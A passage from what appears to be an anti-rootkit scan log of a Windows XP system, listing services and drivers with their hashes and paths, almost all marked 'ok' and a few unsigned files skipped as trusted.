13:18:16.0796 0x020c  [ 3D4E199942E29207970E04315D02AD3B, 0825960894CF9C86CC8775BDD2A262948A09CA495AA7FE9F210FAF49E7086383 ] CryptSvc        C:\WINDOWS\System32\cryptsvc.dll
13:18:16.0953 0x020c  CryptSvc - ok
13:18:16.0953 0x020c  dac2w2k - ok
13:18:16.0968 0x020c  dac960nt - ok
13:18:17.0015 0x020c  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] DcomLaunch      C:\WINDOWS\system32\rpcss.dll
13:18:17.0046 0x020c  DcomLaunch - ok
13:18:17.0093 0x020c  [ 5E38D7684A49CACFB752B046357E0589, F192AD4190BCFB6939A5CBC91648FE63168AF79A5E227A111DEAD6A92E42AB8D ] Dhcp            C:\WINDOWS\System32\dhcpcsvc.dll
13:18:17.0234 0x020c  Dhcp - ok
13:18:17.0265 0x020c  [ 044452051F3E02E7963599FC8F4F3E25, 584BDDB074618BE76454CF90E74829CFF588B5B5FAEB793E2F7AAD26352DD689 ] Disk            C:\WINDOWS\system32\DRIVERS\disk.sys
13:18:17.0406 0x020c  Disk - ok
13:18:17.0406 0x020c  dmadmin - ok
13:18:17.0453 0x020c  [ D992FE1274BDE0F84AD826ACAE022A41, C82BD6561A14F2932A761F5883A787B99031250EE5E9B7B5714AA045545C9B99 ] dmboot          C:\WINDOWS\system32\drivers\dmboot.sys
13:18:17.0625 0x020c  dmboot - ok
13:18:17.0656 0x020c  [ 7C824CF7BBDE77D95C08005717A95F6F, A73CB323B7A6410C3D3F258BF204E716ADF8C84C9E4F6562C57AB73DAED8CCDE ] dmio            C:\WINDOWS\system32\drivers\dmio.sys
13:18:17.0796 0x020c  dmio - ok
13:18:17.0812 0x020c  [ E9317282A63CA4D188C0DF5E09C6AC5F, D41E002F555FE9015EF620975255F58BB79198CA1FF0E09EC950CB450FF77CF7 ] dmload          C:\WINDOWS\system32\drivers\dmload.sys
13:18:17.0953 0x020c  dmload - ok
13:18:17.0984 0x020c  [ 57EDEC2E5F59F0335E92F35184BC8631, 61F6F0DC2D1A6C61D5EF0D5CC4BE0FFC217F1E61FDA3EA9F704709293656600F ] dmserver        C:\WINDOWS\System32\dmserver.dll
13:18:18.0125 0x020c  dmserver - ok
13:18:18.0140 0x020c  [ 8A208DFCF89792A484E76C40E5F50B45, 4E40E2EB38C6254E7CAA488200E89EE7DEBBBA773890BC6A84313CC68178D54F ] DMusic          C:\WINDOWS\system32\drivers\DMusic.sys
13:18:18.0281 0x020c  DMusic - ok
13:18:18.0312 0x020c  [ 5F7E24FA9EAB896051FFB87F840730D2, 356EEFDCD54DECAD0170B34B993E4BF80DD039E2B2922D7A8D09B84031E9FC7A ] Dnscache        C:\WINDOWS\System32\dnsrslvr.dll
13:18:18.0328 0x020c  Dnscache - ok
13:18:18.0390 0x020c  [ 0F0F6E687E5E15579EF4DA8DD6945814, 5C32D88119EB1465B2D719BEE2E05888D1A73454B5E33F2D4928DA710F8BFBA3 ] Dot3svc         C:\WINDOWS\System32\dot3svc.dll
13:18:18.0531 0x020c  Dot3svc - ok
13:18:18.0531 0x020c  dpti2o - ok
13:18:18.0578 0x020c  [ 8F5FCFF8E8848AFAC920905FBD9D33C8, C8C6FB97AB0871C8C88A2201525A5CF10D5131CB6980D32692ED7A8F58399AD5 ] drmkaud         C:\WINDOWS\system32\drivers\drmkaud.sys
13:18:18.0734 0x020c  drmkaud - ok
13:18:18.0781 0x020c  [ 2187855A7703ADEF0CEF9EE4285182CC, 8233CC11F637866C0074043835A785EA2B616739B6B1181B143A253CF2508CFD ] EapHost         C:\WINDOWS\System32\eapsvc.dll
13:18:18.0953 0x020c  EapHost - ok
13:18:19.0078 0x020c  [ FCE87BA643D5E9A8B6E0378508D1B22D, 45B278A763FB183B2B29AF2D2B9D790BA97A800644942AE4AFBBDCF2864B5AB2 ] eeCtrl          C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys
13:18:19.0109 0x020c  eeCtrl - ok
13:18:19.0156 0x020c  [ BC93B4A066477954555966D77FEC9ECB, 27F5B780175EF46DA102EE33F7F33559C8B40C077EEA4405D579D9507F4B1C23 ] ERSvc           C:\WINDOWS\System32\ersvc.dll
13:18:19.0312 0x020c  ERSvc - ok
13:18:19.0359 0x020c  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] Eventlog        C:\WINDOWS\system32\services.exe
13:18:19.0375 0x020c  Eventlog - ok
13:18:19.0421 0x020c  [ D4991D98F2DB73C60D042F1AEF79EFAE, 58AF949EAEBF4FF3E3314DFB66CE4198BF65F0836B68CD27A6ED319742CCCCD2 ] EventSystem     C:\WINDOWS\system32\es.dll
13:18:19.0437 0x020c  EventSystem - ok
13:18:19.0453 0x020c  [ 38D332A6D56AF32635675F132548343E, E6909DB836AF679B4F4D62C7396D6C82769CC7ABB8C919C2AABFE934FCE268F6 ] Fastfat         C:\WINDOWS\system32\drivers\Fastfat.sys
13:18:19.0609 0x020c  Fastfat - ok
13:18:19.0640 0x020c  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] FastUserSwitchingCompatibility C:\WINDOWS\System32\shsvcs.dll
13:18:19.0671 0x020c  FastUserSwitchingCompatibility - ok
13:18:19.0703 0x020c  [ E97D6A8684466DF94FF3BC24FB787A07, 89E5A6889E3C5AB9AD3E80FFC16DD608278F3ADC282048B40B60196336A5CBEB ] Fax             C:\WINDOWS\system32\fxssvc.exe
13:18:19.0859 0x020c  Fax - ok
13:18:19.0890 0x020c  [ 92CDD60B6730B9F50F6A1A0C1F8CDC81, 8307A532AB4D05CBBCE206DC2759497708BF5AAA880BD00F0E4F281D8578A1F5 ] Fdc             C:\WINDOWS\system32\DRIVERS\fdc.sys
13:18:20.0046 0x020c  Fdc - ok
13:18:20.0078 0x020c  [ D45926117EB9FA946A6AF572FBE1CAA3, 4C94EF009D778BE0BDF8F812F026B96F91F641BE30AA2531427A5E63DBD280DA ] Fips            C:\WINDOWS\system32\drivers\Fips.sys
13:18:20.0203 0x020c  Fips - ok
13:18:20.0218 0x020c  [ 9D27E7B80BFCDF1CDD9B555862D5E7F0, 69C271AD5BCEBFD8AE5A769BDD7EC51256DA3A8ADAD5D12E5C0D13F4E82D8805 ] Flpydisk        C:\WINDOWS\system32\DRIVERS\flpydisk.sys
13:18:20.0359 0x020c  Flpydisk - ok
13:18:20.0375 0x020c  [ B2CF4B0786F8212CB92ED2B50C6DB6B0, 280F5CF8A90F7BEDE73ADD0DD0F8952088133A7CA9A3D3B7041957E33B36845D ] FltMgr          C:\WINDOWS\system32\drivers\fltmgr.sys
13:18:20.0531 0x020c  FltMgr - ok
13:18:20.0593 0x020c  [ 8BA7C024070F2B7FDD98ED8A4BA41789, 47585006F86B2C6016EC54250A416794792D1E4024FF229C120BC25B684AF66A ] FontCache3.0.0.0 C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
13:18:20.0609 0x020c  FontCache3.0.0.0 - ok
13:18:20.0640 0x020c  [ 3E1E2BD4F39B0E2B7DC4F4D2BCC2779A, EC635E071201A766845D48973772CBE0958942B4162F3F5F70660D114CC877E0 ] Fs_Rec          C:\WINDOWS\system32\drivers\Fs_Rec.sys
13:18:20.0781 0x020c  Fs_Rec - ok
13:18:20.0812 0x020c  [ 6AC26732762483366C3969C9E4D2259D, FF2C9A23CC17F380093F0BEA955B1925794271C2FEA16B9B7639668E6999BAE3 ] Ftdisk          C:\WINDOWS\system32\DRIVERS\ftdisk.sys
13:18:20.0937 0x020c  Ftdisk - ok
13:18:20.0984 0x020c  [ 185ADA973B5020655CEE342059A86CBB, D3E352DFAF30761505480A4C557D980083F65EC5BD46E2656B2114D47B272A89 ] GEARAspiWDM     C:\WINDOWS\system32\Drivers\GEARAspiWDM.sys
13:18:20.0984 0x020c  GEARAspiWDM - ok
13:18:21.0031 0x020c  [ 0A02C63C8B144BD8C86B103DEE7C86A2, 7A3235DD3E1995DD72B212FAEB3ECA2A974434DE9BF6D269EA11BA65A80E7E50 ] Gpc             C:\WINDOWS\system32\DRIVERS\msgpc.sys
13:18:21.0171 0x020c  Gpc - ok
13:18:21.0250 0x020c  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdate         C:\Program Files\Google\Update\GoogleUpdate.exe
13:18:21.0265 0x020c  gupdate - ok
13:18:21.0265 0x020c  [ 506708142BC63DABA64F2D3AD1DCD5BF, 9C36A08D9E7932FF4DA7B5F24E6B42C92F28685B8ABE964C870E8D7670FD531A ] gupdatem        C:\Program Files\Google\Update\GoogleUpdate.exe
13:18:21.0281 0x020c  gupdatem - ok
13:18:21.0312 0x020c  [ 573C7D0A32852B48F3058CFD8026F511, BC384BBA394AFDCDA1A9ABC858C692AA84A1F0A31AF3DDF7F38D120C027927FB ] HDAudBus        C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
13:18:21.0453 0x020c  HDAudBus - ok
13:18:21.0515 0x020c  [ 4FCCA060DFE0C51A09DD5C3843888BCD, D82417706B517F2610DDF7C86BE03A72EFA9A2A389DF5C8F8ADEAB8144E2C80A ] helpsvc         C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
13:18:21.0656 0x020c  helpsvc - ok
13:18:21.0687 0x020c  [ DEB04DA35CC871B6D309B77E1443C796, F66A15C9528D661940F1F4CA453B3E95036D68C74C3B8AB53644211DBD3D2F32 ] HidServ         C:\WINDOWS\System32\hidserv.dll
13:18:21.0828 0x020c  HidServ - ok
13:18:21.0859 0x020c  [ CCF82C5EC8A7326C3066DE870C06DAF1, 93395FA4C26B2E82DC8B7025ED3BCF583885E5D8C5F60CD6EEAA6335D6A126EC ] hidusb          C:\WINDOWS\system32\DRIVERS\hidusb.sys
13:18:22.0031 0x020c  hidusb - ok
13:18:22.0062 0x020c  [ 8878BD685E490239777BFE51320B88E9, C5C3ECF6B049B6736E35B39518A8F830B45C45A88FFE8E3A6B7922AD946597E2 ] hkmsvc          C:\WINDOWS\System32\kmsvc.dll
13:18:22.0203 0x020c  hkmsvc - ok
13:18:22.0203 0x020c  hpn - ok
13:18:22.0312 0x020c  [ 5DA42D24712E00728CEA2342A65009B2, 73EC5250DCFD556525B24B3CA66C64AC7747E77652A2AD6119936A59A9E8562A ] hpqcxs08        C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll
13:18:22.0328 0x020c  hpqcxs08 - ok
13:18:22.0375 0x020c  [ D86A39BF100069444D026D22D9A6E555, 7B24D48D5BA67704C88697FADB64364E0E64D26259408E3C219820C5404C5EEC ] hpqddsvc        C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll
13:18:22.0390 0x020c  hpqddsvc - ok
13:18:22.0437 0x020c  [ A04F4AC48895774A2CF9D1C9EAAACEF0, 012F10DE086C3551D75716EF1F6DCC477C8C1E776267D9FC4073BEADAFD37C9C ] HPSLPSVC        C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL
13:18:22.0468 0x020c  HPSLPSVC - ok
13:18:22.0515 0x020c  [ D03D10F7DED688FECF50F8FBF1EA9B8A, C19A733571BA831E24EE45EDB730FFFDBA22638F138A32A794BEAB8D8B71D8DD ] HPZid412        C:\WINDOWS\system32\DRIVERS\HPZid412.sys
13:18:22.0562 0x020c  HPZid412 - ok
13:18:22.0578 0x020c  [ 89F41658929393487B6B7D13C8528CE3, 5D06A11225A83F3F33417148BE53654080C88BFA876FEB486A7E43410AC99F23 ] HPZipr12        C:\WINDOWS\system32\DRIVERS\HPZipr12.sys
13:18:22.0625 0x020c  HPZipr12 - ok
13:18:22.0656 0x020c  [ ABCB05CCDBF03000354B9553820E39F8, 6361B5A57CDE23AC5E987ACECF3BEE7AD51134C6E5BF4F833E512C9BC4B86877 ] HPZius12        C:\WINDOWS\system32\DRIVERS\HPZius12.sys
13:18:22.0703 0x020c  HPZius12 - ok
13:18:22.0750 0x020c  [ F80A415EF82CD06FFAF0D971528EAD38, 524D9E9201572929522F6805011783711B7C0F76308B924C89CF75F4B7A1FDF3 ] HTTP            C:\WINDOWS\system32\Drivers\HTTP.sys
13:18:22.0781 0x020c  HTTP - ok
13:18:22.0828 0x020c  [ 6100A808600F44D999CEBDEF8841C7A3, 61A75118C327812C60622010985A2E80E79B6FD9030A5732390EE5426E4AF6C9 ] HTTPFilter      C:\WINDOWS\System32\w3ssl.dll
13:18:23.0000 0x020c  HTTPFilter - ok
13:18:23.0000 0x020c  i2omp - ok
13:18:23.0015 0x020c  [ 4A0B06AA8943C1E332520F7440C0AA30, DB2452390CCFE67E0C5FEB4FD42CA24ABE2DDD40D0B22DD5F5B8F70416863918 ] i8042prt        C:\WINDOWS\system32\DRIVERS\i8042prt.sys
13:18:23.0156 0x020c  i8042prt - ok
13:18:23.0250 0x020c  [ 88164BA0E3FC4172FF3A1BD82B756454, 678A6C5FD8254993D5ACDECAB24EF84E8C00875E8E310CA962EEB993C573906D ] ialm            C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
13:18:23.0296 0x020c  ialm - ok
13:18:23.0343 0x020c  [ 6F95324909B502E2651442C1548AB12F, FF1B104990FE186C6100ED229A45345FF695323AC778688EC11AA8F5A87B141E ] IDriverT        C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:18:23.0359 0x020c  IDriverT - detected UnsignedFile.Multi.Generic ( 1 )
13:18:23.0359 0x020c  Detect skipped due to KSN trusted
13:18:23.0359 0x020c  IDriverT - ok
13:18:23.0437 0x020c  [ C01AC32DC5C03076CFB852CB5DA5229C, A4D7749220B5BC965D96A267F1E02FE8284A230BA249109207BD4B9EA8DFAC96 ] idsvc           C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:18:23.0484 0x020c  idsvc - ok
13:18:23.0500 0x020c  [ 083A052659F5310DD8B6A6CB05EDCF8E, 48D39B03FFB6FAA1529B774443BA12618AE3982D9F65A7B9D18F2269F78B31F4 ] Imapi           C:\WINDOWS\system32\DRIVERS\imapi.sys
13:18:23.0640 0x020c  Imapi - ok
13:18:23.0687 0x020c  [ 30DEAF54A9755BB8546168CFE8A6B5E1, 3936228CD3125C763ABFCB93E86E4B43838202BCC0913A28E84AC0263B43EE0D ] ImapiService    C:\WINDOWS\system32\imapi.exe
13:18:23.0843 0x020c  ImapiService - ok
13:18:23.0859 0x020c  ini910u - ok
13:18:24.0062 0x020c  [ FA9A9468F982835E99C1EC21257F7E60, 0A31307CDF8833FD9378B297F6860B36AF5FB535816145AAC8B9C907AECF4B17 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RtkHDAud.sys
13:18:24.0312 0x020c  IntcAzAudAddService - ok
13:18:24.0359 0x020c  [ 8C953733D8F36EB2133F5BB58808B66B, 555868F246D73652E998B0B1296476E42FCEDED30D646CC000F31ECE4EBC25E6 ] intelppm        C:\WINDOWS\system32\DRIVERS\intelppm.sys
13:18:24.0500 0x020c  intelppm - ok
13:18:24.0578 0x020c  [ 1663A135865F0BA6E853353E98E67F2A, 700D383F964EBF38D9B66A6C7966700F0DBE7C7AF77AAE2F67AF703E36C8116B ] IntuitUpdateServiceV4 C:\Program Files\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
13:18:24.0593 0x020c  IntuitUpdateServiceV4 - ok
13:18:24.0625 0x020c  [ 3BB22519A194418D5FEC05D800A19AD0, F6662F440950596DC1382DD1DB5D7891CCEA30A6062BEA942C18445B5F0D8B16 ] Ip6Fw           C:\WINDOWS\system32\drivers\ip6fw.sys
13:18:24.0796 0x020c  Ip6Fw - ok
13:18:24.0828 0x020c  [ 731F22BA402EE4B62748ADAF6363C182, 5C3BEBD008A5BE4DC2F92076FF41A10DDC01E10EC7E6552213CFA11970811848 ] IpFilterDriver  C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
13:18:24.0968 0x020c  IpFilterDriver - ok
13:18:25.0000 0x020c  [ B87AB476DCF76E72010632B5550955F5, E6E74D3A86A7917A8BAED44F8E97CCD2EB171E4E4B27E9907F60D1523FAF319A ] IpInIp          C:\WINDOWS\system32\DRIVERS\ipinip.sys
13:18:25.0125 0x020c  IpInIp - ok
13:18:25.0156 0x020c  [ CC748EA12C6EFFDE940EE98098BF96BB, AF523E21C25D9A1715EFEA573E4F52AF5D4FC9F28A2D613F5DB629C186C439E0 ] IpNat           C:\WINDOWS\system32\DRIVERS\ipnat.sys
13:18:25.0296 0x020c  IpNat - ok
13:18:25.0359 0x020c  [ BC0EA61246F8D940FBC5F652D337D6BD, BF018317631937EED13136608831F526BE34AF7E59FEF4863E3EDD205C02E1A7 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
13:18:25.0406 0x020c  iPod Service - ok
13:18:25.0421 0x020c  [ 23C74D75E36E7158768DD63D92789A91, 394D296F38E7D8EFD91A6EEC301D9CE6AF910E35EB9819F1A9E3363863AEDFDC ] IPSec           C:\WINDOWS\system32\DRIVERS\ipsec.sys
13:18:25.0562 0x020c  IPSec - ok
13:18:25.0593 0x020c  [ C93C9FF7B04D772627A3646D89F7BF89, 805FA48E7A46D4F10240BF880A2468F53DEA36E83004399228AB70DB7D20544A ] IRENUM          C:\WINDOWS\system32\DRIVERS\irenum.sys
13:18:25.0734 0x020c  IRENUM - ok
13:18:25.0750 0x020c  [ 05A299EC56E52649B1CF2FC52D20F2D7, 2654619DB3E6D6C385B63AB02F87D4241C4F0250CC31383D1B3586917166C2DC ] isapnp          C:\WINDOWS\system32\DRIVERS\isapnp.sys
13:18:25.0890 0x020c  isapnp - ok
13:18:26.0000 0x020c  [ 9ECF00E19736054E019C532AED8228FC, F5A64A8269EA3655BBD4850298F335C0BD30535258928ED7CE62A32A3363E60B ] JavaQuickStarterService C:\Program Files\Java\jre7\bin\jqs.exe
13:18:26.0015 0x020c  JavaQuickStarterService - ok
13:18:26.0031 0x020c  [ 463C1EC80CD17420A542B7F36A36F128, E3B11BA26AFEAFB50B0FC168EA07F6049DA6B88BCDDEEE20310602D7FC27A3A7 ] Kbdclass        C:\WINDOWS\system32\DRIVERS\kbdclass.sys
13:18:26.0171 0x020c  Kbdclass - ok
13:18:26.0203 0x020c  [ 692BCF44383D056AED41B045A323D378, 1A99DEE83FFAF64E73067FC049C0A4CE07D94E4AE31EFA17B38CEFA9E41D67DC ] kmixer          C:\WINDOWS\system32\drivers\kmixer.sys
13:18:26.0359 0x020c  kmixer - ok
13:18:26.0375 0x020c  [ B467646C54CC746128904E1654C750C1, 3BD71BE3663EA23463D236D8A2A2E42DFA10C502BDB4B6E131FAF0FBA748219E ] KSecDD          C:\WINDOWS\system32\drivers\KSecDD.sys
13:18:26.0406 0x020c  KSecDD - ok
13:18:26.0437 0x020c  [ 3A7C3CBE5D96B8AE96CE81F0B22FB527, 0044F03132596A494448CCE5F3D6ECC12617BB4CF6BAE348F79D4DC40ACD6EE0 ] lanmanserver    C:\WINDOWS\System32\srvsvc.dll
13:18:26.0468 0x020c  lanmanserver - ok
13:18:26.0515 0x020c  [ A8888A5327621856C0CEC4E385F69309, B08B63300D824E35E31EEEA2C4C086DFA2C2A964CEDAE512E74D3D88AADAA2C1 ] lanmanworkstation C:\WINDOWS\System32\wkssvc.dll
13:18:26.0531 0x020c  lanmanworkstation - ok
13:18:26.0578 0x020c  [ A7DB739AE99A796D91580147E919CC59, EDF4E039BA277B0E6D66FEB0B28096E67D682C09DFC18ECECF062D9DCFB75ACF ] LmHosts         C:\WINDOWS\System32\lmhsvc.dll
13:18:26.0750 0x020c  LmHosts - ok
13:18:26.0765 0x020c  [ 986B1FF5814366D71E0AC5755C88F2D3, E6AF051174531C24B38E73987755D366ABEC595476C6D17793E8DCCC73F55340 ] Messenger       C:\WINDOWS\System32\msgsvc.dll
13:18:26.0890 0x020c  Messenger - ok
13:18:26.0906 0x020c  [ 4AE068242760A1FB6E1A44BF4E16AFA6, 1FB771162B96AAF787AC24867B818DF8511F0780BB094FA9A38C11D8DBFE68BC ] mnmdd           C:\WINDOWS\system32\drivers\mnmdd.sys
13:18:27.0031 0x020c  mnmdd - ok
13:18:27.0062 0x020c  [ D18F1F0C101D06A1C1ADF26EED16FCDD, BA0837C7780BD8262E143E2935AFA63BE59C3C39EF56CB8608EED0F50AF070D4 ] mnmsrvc         C:\WINDOWS\system32\mnmsrvc.exe
13:18:27.0203 0x020c  mnmsrvc - ok
13:18:27.0234 0x020c  [ DFCBAD3CEC1C5F964962AE10E0BCC8E1, B342CC9EC3729AB1AB4B5E2E99F890C1E0CA649162DE91F6768AB857B719E97B ] Modem           C:\WINDOWS\system32\drivers\Modem.sys
13:18:27.0359 0x020c  Modem - ok
13:18:27.0406 0x020c  [ 35C9E97194C8CFB8430125F8DBC34D04, 0C0FCE6B0A23FB0ECB92E1663E1C72D2DD5B177D82E04782957690B69530DB39 ] Mouclass        C:\WINDOWS\system32\DRIVERS\mouclass.sys
13:18:27.0562 0x020c  Mouclass - ok
13:18:27.0593 0x020c  [ B1C303E17FB9D46E87A98E4BA6769685, 161A45488522055D0F0474ABEDA04DDD0B5DAC2411AF9154B15190BBD66E7153 ] mouhid          C:\WINDOWS\system32\DRIVERS\mouhid.sys
13:18:27.0734 0x020c  mouhid - ok
13:18:27.0750 0x020c  [ A80B9A0BAD1B73637DBCBBA7DF72D3FD, 2A5E15ED2C24C6C65EF2F7E1FD93374774076C9D8D451E4422561F4D269C012F ] MountMgr        C:\WINDOWS\system32\drivers\MountMgr.sys
13:18:27.0906 0x020c  MountMgr - ok
13:18:27.0953 0x020c  [ FD5E45969B82B83E33CB05B5C9B0E3F2, A6C21F7A0A97683DA50FC102131618CC1BE5CA0C3625D2FDAF5861B9B6523E45 ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
13:18:27.0984 0x020c  MozillaMaintenance - detected UnsignedFile.Multi.Generic ( 1 )
13:18:27.0984 0x020c  Detect skipped due to KSN trusted
13:18:27.0984 0x020c  MozillaMaintenance - ok
13:18:28.0000 0x020c  mraid35x - ok
13:18:28.0031 0x020c  [ 11D42BB6206F33FBB3BA0288D3EF81BD, 76ABCFB62C5AC549F58C231F72A99882CDEB74928104B77FE52554765C2B1A22 ] MRxDAV          C:\WINDOWS\system32\DRIVERS\mrxdav.sys
13:18:28.0187 0x020c  MRxDAV - ok
13:18:28.0218 0x020c  [ A137F1470499A205ABBB9AAFB3B6F2B1, FB4951727543030D9E6ED74149C3FAACE2CA9DA8C1B5F616301B30B858C724E8 ] MSDTC           C:\WINDOWS\system32\msdtc.exe
13:18:28.0343 0x020c  MSDTC - ok
13:18:28.0390 0x020c  [ C941EA2454BA8350021D774DAF0F1027, C940E978C7B66A713A0FDAB54B5F995DF59D089AFCD96221DD3222948CD49BBD ] Msfs            C:\WINDOWS\system32\drivers\Msfs.sys
13:18:28.0578 0x020c  Msfs - ok
13:18:28.0593 0x020c  MSIServer - ok
13:18:28.0609 0x020c  [ D1575E71568F4D9E14CA56B7B0453BF1, 4ABE0E24786C0D39FA2B885447E56204CA6942FB175E534DCE675D7BCF0B176A ] MSKSSRV         C:\WINDOWS\system32\drivers\MSKSSRV.sys
13:18:28.0750 0x020c  MSKSSRV - ok
13:18:28.0750 0x020c  [ 325BB26842FC7CCC1FCCE2C457317F3E, C07BE560513B1FB91D756494F0BA4AEEB2E1998DE0E1C21EE83DB1183B0CEE91 ] MSPCLOCK        C:\WINDOWS\system32\drivers\MSPCLOCK.sys
13:18:28.0890 0x020c  MSPCLOCK - ok
13:18:28.0890 0x020c  [ BAD59648BA099DA4A17680B39730CB3D, 9AD4C7C94C186C8815D0BC75DCAFB962158DA6935A244BA243EDDDEB33F9816C ] MSPQM           C:\WINDOWS\system32\drivers\MSPQM.sys
13:18:29.0031 0x020c  MSPQM - ok
13:18:29.0078 0x020c  [ AF5F4F3F14A8EA2C26DE30F7A1E17136, AC93A1E4ABB0D038B772E429015567E44CC2EDB66C54DBE23A5F98176FAC1520 ] mssmbios        C:\WINDOWS\system32\DRIVERS\mssmbios.sys
13:18:29.0203 0x020c  mssmbios - ok
13:18:29.0250 0x020c  [ DE6A75F5C270E756C5508D94B6CF68F5, FCC972DDC36C2C44D836913F10004C2C33B11C54DEFFF0C63E0FDF901D2F9261 ] Mup             C:\WINDOWS\system32\drivers\Mup.sys
13:18:29.0265 0x020c  Mup - ok
13:18:29.0312 0x020c  [ 0102140028FAD045756796E1C685D695, 5335B8278418CA200E2772124F0602C3E15A5CAF2D5CC59F6785DFAABF339B09 ] napagent        C:\WINDOWS\System32\qagentrt.dll
13:18:29.0468 0x020c  napagent - ok
13:18:29.0500 0x020c  [ 1DF7F42665C94B825322FAE71721130D, FE0DCB728471465B39A42A7511F4133021FBA5DF88F88BCB5FE2FF34CFD713F9 ] NDIS            C:\WINDOWS\system32\drivers\NDIS.sys
13:18:29.0640 0x020c  NDIS - ok
13:18:29.0671 0x020c  [ 0109C4F3850DFBAB279542515386AE22, 4F6DB1E499AC853FD36FD603FBB6D3AC9BDCEB298C7FE1FB59A9236CB46729B2 ] NdisTapi        C:\WINDOWS\system32\DRIVERS\ndistapi.sys
13:18:29.0687 0x020c  NdisTapi - ok
13:18:29.0718 0x020c  [ F927A4434C5028758A842943EF1A3849, B1AA3AF150C05307461774925901789456B0CCCD03A5E71ADA4AB58455962BEE ] Ndisuio         C:\WINDOWS\system32\DRIVERS\ndisuio.sys
13:18:29.0859 0x020c  Ndisuio - ok
13:18:29.0875 0x020c  [ EDC1531A49C80614B2CFDA43CA8659AB, 494042F790F33721328B4451E79842E21919681CC421A4F9633EC4D383E06097 ] NdisWan         C:\WINDOWS\system32\DRIVERS\ndiswan.sys
13:18:30.0031 0x020c  NdisWan - ok
13:18:30.0046 0x020c  [ 2F597BB467E05B1FE3830EABD821B8E0, 141497F5A49D47CCE3C9289644F4BD838DCB238F6D8E847FC006652E21FE02AC ] NDProxy         C:\WINDOWS\system32\drivers\NDProxy.sys
13:18:30.0062 0x020c  NDProxy - ok
13:18:30.0093 0x020c  [ A081CB6FB9A12668F233EB5414BE3A0E, EE2A1311B51D1FEBAF79F45E568A927D8EA7704AFC8495AED2D26927566F61E3 ] Net Driver HPZ12 C:\WINDOWS\system32\HPZinw12.dll
13:18:30.0109 0x020c  Net Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:18:30.0109 0x020c  Detect skipped due to KSN trusted
13:18:30.0109 0x020c  Net Driver HPZ12 - ok
13:18:30.0125 0x020c  [ 5D81CF9A2F1A3A756B66CF684911CDF0, 7989C36607CAEA17AFA2C1C9904145CA0714A54B9F712D9D4C1AB140D0B2CC0C ] NetBIOS         C:\WINDOWS\system32\DRIVERS\netbios.sys
13:18:30.0250 0x020c  NetBIOS - ok
13:18:30.0281 0x020c  [ 74B2B2F5BEA5E9A3DC021D685551BD3D, 7932B71F98B4122BE88F576BF6D745A757AE378A48924B7F4358837B75640A82 ] NetBT           C:\WINDOWS\system32\DRIVERS\netbt.sys
13:18:30.0437 0x020c  NetBT - ok
13:18:30.0484 0x020c  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDE          C:\WINDOWS\system32\netdde.exe
13:18:30.0609 0x020c  NetDDE - ok
13:18:30.0625 0x020c  [ B857BA82860D7FF85AE29B095645563B, 86FF0E4CDD9C394E8BABD93A4D57E73FF9A779261717DEC6E9CDE99F1C6B0F4C ] NetDDEdsdm      C:\WINDOWS\system32\netdde.exe
13:18:30.0750 0x020c  NetDDEdsdm - ok
13:18:30.0796 0x020c  [ A4ABB21D13528D1BA3ABF484B2DF24FE, 2DC5CFB023D990FD5680859660108EA80FB320A882C5B4BBAA3A061D7C870F46 ] netfilter       C:\WINDOWS\system32\drivers\netfilter.sys
13:18:30.0812 0x020c  netfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:18:30.0812 0x020c  Detect skipped due to KSN trusted
13:18:30.0812 0x020c  netfilter - ok
13:18:30.0843 0x020c  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] Netlogon        C:\WINDOWS\system32\lsass.exe
13:18:30.0984 0x020c  Netlogon - ok
13:18:31.0000 0x020c  [ 13E67B55B3ABD7BF3FE7AAE5A0F9A9DE, 4E0A67B3CC897E80D4B342FFE8B7B4CC4F6CA2EF2D34C136027A098B2E1C6166 ] Netman          C:\WINDOWS\System32\netman.dll
13:18:31.0156 0x020c  Netman - ok
13:18:31.0203 0x020c  [ D34612C5D02D026535B3095D620626AE, 1BBCCCBF49EB8807240A77DCB43C25C21682073CC5356594E2C4F53EF36BF657 ] NetTcpPortSharing C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
13:18:31.0218 0x020c  NetTcpPortSharing - ok
13:18:31.0265 0x020c  [ E9E47CFB2D461FA0FC75B7A74C6383EA, 544136F5BFD4DC23D45E90F12FA48B82FD9EAEA9EAF3E0F5F0BD27E23D672C3E ] NIC1394         C:\WINDOWS\system32\DRIVERS\nic1394.sys
13:18:31.0406 0x020c  NIC1394 - ok
13:18:31.0437 0x020c  [ 943337D786A56729263071623BBB9DE5, B631B47C869FE4ACF46E4AA272435D9A9CA536E3349E3FFBB8602636FEE7AFD4 ] Nla             C:\WINDOWS\System32\mswsock.dll
13:18:31.0453 0x020c  Nla - ok
